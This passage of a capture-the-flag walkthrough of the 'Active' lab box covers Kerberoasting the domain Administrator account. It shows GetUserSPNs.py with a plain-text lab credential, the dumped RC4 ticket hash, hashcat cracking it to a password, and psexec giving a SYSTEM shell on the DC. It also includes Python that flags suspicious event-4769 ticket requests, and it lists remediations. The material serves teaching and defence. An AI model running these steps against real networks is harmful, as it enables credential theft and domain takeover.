objectCategory : CN=Person,CN=Schema,CN=Configuration,DC=active,DC=htb
lastLogonTimestamp : 12/03/2026 11:24:52 (today)
vulnerabilities : [VULN-001] Kerberoastable high privilege account (MEDIUM)
[VULN-002] User account with password that never expires (LOW)
[VULN-020] Admin account with delegation enabled (HIGH)
╭─LDAP─[DC.active.htb]─[ACTIVE\SVC_TGS]-[NS:10.129.5.64]
╰─ ❯

We can see that the Administrator account is Kerberoastable. Why? Because it has an SPN set (active/CIFS:445). Any authenticated domain user can ask the KDC for a service ticket for any registered SPN, and the KDC encrypts that ticket with the service account's own long-term key. When the ticket is issued with RC4 (etype 23) that key is simply the account's NT hash, so the ticket can be taken offline and password guesses tried against it at full speed with nobody locking the account. In this case the SPN just happens to sit on the Administrator account, a member of Domain Admins, so a weak password here is the whole domain.
We can use Impacket's GetUserSPNs.py to request the ticket, then hashcat (mode 13100 for etype 23 TGS-REP) to crack it offline. Note the first attempt below fails only because Impacket flags take a single dash (-dc-ip), not --dc-ip.
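Before we request the ticket, it is worth knowing what this looks like from the defender's side, because the whole attack is a single legitimate-looking TGS request. On the DC it shows up as Security event 4769 with the requesting account, the target service name, and the TicketEncryptionType (0x17 is RC4, the cheap one to crack; 0x12 is AES-256, hashcat mode 19700 and far slower). The following Python is an added example, not code from the original post: it runs two simple rules over constructed 4769 records. The sample records and IP addresses are made up, not logs from this box; the field names follow the Windows event XML.

```python
from collections import defaultdict

RC4_HMAC = "0x17"  # TicketEncryptionType for etype 23, the cheap-to-crack one

# Constructed sample 4769 (Kerberos service ticket request) records, NOT real logs.
# TargetUserName is the requester, ServiceName is the SPN's account. IPs are made up.
SAMPLE_4769 = [
    {"TargetUserName": "SVC_TGS@ACTIVE.HTB", "ServiceName": "Administrator",
     "TicketEncryptionType": "0x17", "IpAddress": "10.10.14.5"},
    {"TargetUserName": "SVC_TGS@ACTIVE.HTB", "ServiceName": "DC$",
     "TicketEncryptionType": "0x12", "IpAddress": "10.10.14.5"},
    {"TargetUserName": "DC$@ACTIVE.HTB", "ServiceName": "krbtgt",
     "TicketEncryptionType": "0x12", "IpAddress": "10.129.5.64"},
    {"TargetUserName": "jdoe@ACTIVE.HTB", "ServiceName": "sqlsvc",
     "TicketEncryptionType": "0x17", "IpAddress": "10.129.5.80"},
    {"TargetUserName": "jdoe@ACTIVE.HTB", "ServiceName": "websvc",
     "TicketEncryptionType": "0x17", "IpAddress": "10.129.5.80"},
    {"TargetUserName": "jdoe@ACTIVE.HTB", "ServiceName": "backupsvc",
     "TicketEncryptionType": "0x17", "IpAddress": "10.129.5.80"},
]


def is_user_service(service_name: str) -> bool:
    """Computer accounts end in '$' and krbtgt is the TGT service; neither is a roast target."""
    s = service_name.lower()
    return not s.endswith("$") and s != "krbtgt"


def rc4_user_spn_requests(events):
    """Rule 1: a service ticket issued with RC4 for a user-account SPN.
    Returns (requester, service, source ip) for each hit."""
    hits = []
    for e in events:
        if e["TicketEncryptionType"].lower() == RC4_HMAC and is_user_service(e["ServiceName"]):
            hits.append((e["TargetUserName"], e["ServiceName"], e["IpAddress"]))
    return hits


def bulk_requesters(events, threshold=3):
    """Rule 2: one principal pulling tickets for many distinct user SPNs, the
    GetUserSPNs.py -request pattern. The caller slices events to a time window;
    returns {requester: sorted list of services} for requesters at or over threshold."""
    seen = defaultdict(set)
    for e in events:
        if is_user_service(e["ServiceName"]):
            seen[e["TargetUserName"]].add(e["ServiceName"])
    return {who: sorted(spns) for who, spns in seen.items() if len(spns) >= threshold}


if __name__ == "__main__":
    for hit in rc4_user_spn_requests(SAMPLE_4769):
        print("RC4 TGS for user SPN:", hit)
    for who, spns in bulk_requesters(SAMPLE_4769).items():
        print("bulk SPN requests:", who, spns)
```

Tune before deploying: legacy clients still negotiate RC4 legitimately, and an account with no AES keys (or msDS-SupportedEncryptionTypes unset) gets RC4 tickets regardless of what the client asks for, so rule 1 is a lead, not a verdict. Rule 2 is the stronger signal, because ordinary users do not request tickets for every SPN in the domain in one go.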
jbrown@Jabaris-MacBook-Pro examples % python3 GetUserSPNs.py active.htb/SVC_TGS:GPPstillStandingStrong2k18 --dc-ip 10.129.5.64 -request
Impacket v0.14.0.dev0+20260219.104542.8728bbcf - Copyright Fortra, LLC and its affiliated companies
usage: GetUserSPNs.py [-h] [-target-domain TARGET_DOMAIN] [-no-preauth NO_PREAUTH] [-stealth] [-machine-only] [-usersfile USERSFILE] [-request] [-request-user username | -request-machine machinename]
[-save] [-outputfile OUTPUTFILE] [-ts] [-debug] [-hashes LMHASH:NTHASH] [-no-pass] [-k] [-aesKey hex key] [-dc-ip ip address] [-dc-host hostname]
target
GetUserSPNs.py: error: unrecognized arguments: --dc-ip 10.129.5.64
jbrown@Jabaris-MacBook-Pro examples % python3 GetUserSPNs.py active.htb/SVC_TGS:GPPstillStandingStrong2k18 -dc-ip 10.129.5.64 -request
Impacket v0.14.0.dev0+20260219.104542.8728bbcf - Copyright Fortra, LLC and its affiliated companies
ServicePrincipalName Name MemberOf PasswordLastSet LastLogon Delegation
-------------------- ------------- -------------------------------------------------------- -------------------------- -------------------------- ----------
active/CIFS:445 Administrator CN=Group Policy Creator Owners,CN=Users,DC=active,DC=htb 2018-07-18 15:06:40.351723 2026-03-12 07:25:43.945762
[-] CCache file is not found. Skipping...
$krb5tgs$23$*Administrator$ACTIVE.HTB$active.htb/Administrator*$efc61854f043150d962fac56d17ef9e4$ecd203c73bea10c35e5d04764024506e7bfc81f9e98c5588d2193972afa2cff88b927afeac4a1ff88a661b2d7f687bd0fd59b362088d540e2ee78f619cc234d508256e91afdc9fd86f03bbc3dffc3560bbb4e4e1cf9e409cfe94303b02b9bd2739c25105514e0f47cb20af8bc6b208d0cf5adc8c80494e67f2301429ef976bcda228e6ac6ff39d5cb4b35618f7d2f6b4293794898ff4b842cf2563a761cbb8594d6f0eab85087752b5a262838379d9b451db3cec77813c30cfd10a941398f51d6e04645a45d57ab59b22565def2868d96c02c676b0089453a4222d708d0d01a6189b07c7d4c000020b9088830ed6aa00e8cc84c35ecb367ab472ede020993ac39c423668b9aadddbcbb5af3982f9d34dbac0339b6dc6ed8e13951b78ad6eeb20edb87571eb4e54b247324d29aa14d97c0f8df510ac4f33a36a839703bdcd88c693245976967c2db19ca841d25dacdd3fd30a7365e40e5cd2679379ef7cc27cb16abd2feee8e439d750cb959a663ab1392585e4671b06a1600bf5645fccbd7ae1cce9eaa0c677d3979fcf4d7330de8e59a91155ad29666bec28b00feafdb7fca5623c5b3e68919e31784efa0a19d76a151ca1078d0a675fd7f26ebe5de2acdddc092250fb2b8f96c9fa597d9e519622eab0e8e2617a0d5e83ec64aabd5c3dae024dc3b0da6360811bfd015b6efe5cda8646a07a1a3249e27800592abc0adc7883eaab170aa3d96fab433b7c7d10d71edce1f9b5eee19ff0d5cc8053ed1547b40a3c2322481c4156bbd9079c003b4abe4c11092ab3c8a3c83b8bb70b7e145e629b00f83769e590c0b65bdf9d58017ad637470e89d977ae85836c65bb0e71643bbc01ee2c77d8e47d14dd5ef24b376d25a084321d7c031964e415e45605d517f187715a3fa582543acc54149ca93b5667846f191a19d4a23f6a5bda5e9bb04942d95c26ce9cef6ae9258419657a412ebd560231d27e19833d39e46038611575349816453830c258245ea22fdcaa36b4fc30e525fe89474832b7c3277b902ed5558259837c0dedc2416976386af9adf914f1e42433b4430907ec7e92f2b8f869d3289c53859099a24ed46271917f6ff7030e1fdf44c19b45d3115735e3c15d57b9547547d9aabe44deb9dcf545ed24b54fb08b19d284f79969b920c9296b539aae4ba80750feef96ee717ccfe9396ee48cdf92ba835a128b7df20f313321a3743070f1720e215af94408c87b9d3f8c13ee9c3830bd80e13a8bc24050
Hashes: 1 digests; 1 unique digests, 1 unique salts
Bitmaps: 16 bits, 65536 entries, 0x0000ffff mask, 262144 bytes, 5/13 rotates
Rules: 1
Optimizers applied:
* Zero-Byte
* Not-Iterated
* Single-Hash
* Single-Salt
ATTENTION! Pure (unoptimized) backend kernels selected.
Pure kernels can crack longer passwords, but drastically reduce performance.
If you want to switch to optimized kernels, append -O to your commandline.
See the above message to find out about the exact limits.
Watchdog: Temperature abort trigger set to 100c
Host memory allocated for this attack: 599 MB (1115 MB free)
Dictionary cache hit:
* Filename..: ../../wordlist/rockyou.txt
* Passwords.: 14344384
* Bytes.....: 139921497
* Keyspace..: 14344384
$krb5tgs$23$*Administrator$ACTIVE.HTB$active.htb/Administrator*$efc61854f043150d962fac56d17ef9e4$...:Ticketmaster1968
Session..........: hashcat
Status...........: Cracked
Hash.Mode........: 13100 (Kerberos 5, etype 23, TGS-REP)
Hash.Target......: $krb5tgs$23$*Administrator$ACTIVE.HTB$active.htb/Ad...c24050
Time.Started.....: Thu Mar 12 18:28:04 2026 (1 sec)
Time.Estimated...: Thu Mar 12 18:28:05 2026 (0 secs)
Kernel.Feature...: Pure Kernel (password length 0-256 bytes)
Guess.Base.......: File (../../wordlist/rockyou.txt)
Guess.Queue......: 1/1 (100.00%)
Speed.#02........: 8375.7 kH/s (0.59ms) @ Accel:1024 Loops:1 Thr:32 Vec:1
Recovered........: 1/1 (100.00%) Digests (total), 1/1 (100.00%) Digests (new)
Progress.........: 10813440/14344384 (75.38%)
Rejected.........: 0/10813440 (0.00%)
Restore.Point....: 10485760/14344384 (73.10%)
Restore.Sub.#02..: Salt:0 Amplifier:0-1 Iteration:0-1
Candidate.Engine.: Device Generator
Candidates.#02...: XiaoLing.1215 -> Ms.Jordan
Hardware.Mon.SMC.: Fan0: 16%
Hardware.Mon.#02.: Util: 84% Pwr:213mW
Started: Thu Mar 12 18:27:57 2026
Stopped: Thu Mar 12 18:28:06 2026
jbrown@Jabaris-MacBook-Pro hashcat %
Ticketmaster1968

After cracking the ticket, we recover the Administrator password: Ticketmaster1968. Since SMB is open on 445 and we now hold a Domain Admin credential, we can use Impacket's psexec.py with it to get a shell on the DC. As the output shows, it uploads a service binary to the writable ADMIN$ share, registers it as a service through the Service Control Manager and starts it, which is why the shell runs as SYSTEM, and also why this is loud on any network that watches service creation.
Impacket v0.14.0.dev0+20260219.104542.8728bbcf - Copyright Fortra, LLC and its affiliated companies
Password:
[*] Requesting shares on 10.129.5.64.....
[*] Found writable share ADMIN$
[*] Uploading file YETMasmX.exe
[*] Opening SVCManager on 10.129.5.64.....
[*] Creating service eehN on 10.129.5.64.....
[*] Starting service eehN.....
[!] Press help for extra shell commands
Microsoft Windows [Version 6.1.7601]
Copyright (c) 2009 Microsoft Corporation. All rights reserved.
C:\Windows\system32> cd ../
C:\Windows> cd ../
C:\> cd Users
C:\Users> cd Administrators
The system cannot find the path specified.
C:\Users> cd Administrator
C:\Users\Administrator> cd Desktop
C:\Users\Administrator\Desktop> type root.txt
***AdminFlagFoundHERE***
C:\Users\Administrator\Desktop>

And just like that, we found the flag.
What started with some simple enumeration using Nmap eventually led us to an exposed SMB share, a Group Policy Preferences password, and finally a Kerberoastable account. From there it was just a matter of requesting the ticket, cracking it with Hashcat, and using the recovered credentials to get a shell.
This box is a good reminder that small misconfigurations in Active Directory can go a long way. A share readable by an anonymous session, a GPP cpassword left in a policy file, an SPN registered on a Domain Admin account, and a password that appears in rockyou.txt were all it took to turn zero access into domain compromise. The fixes are just as unglamorous: restrict anonymous SMB access, search SYSVOL (and any stale copies of it, like this Replication share) for cpassword and remove the entries yourself because MS14-025 won't do it for you, keep SPNs off privileged accounts, and give service accounts long random passwords (or use gMSAs) with AES-only Kerberos so a roasted ticket is not worth cracking.
Hope you enjoyed the walkthrough, and as always — happy hacking.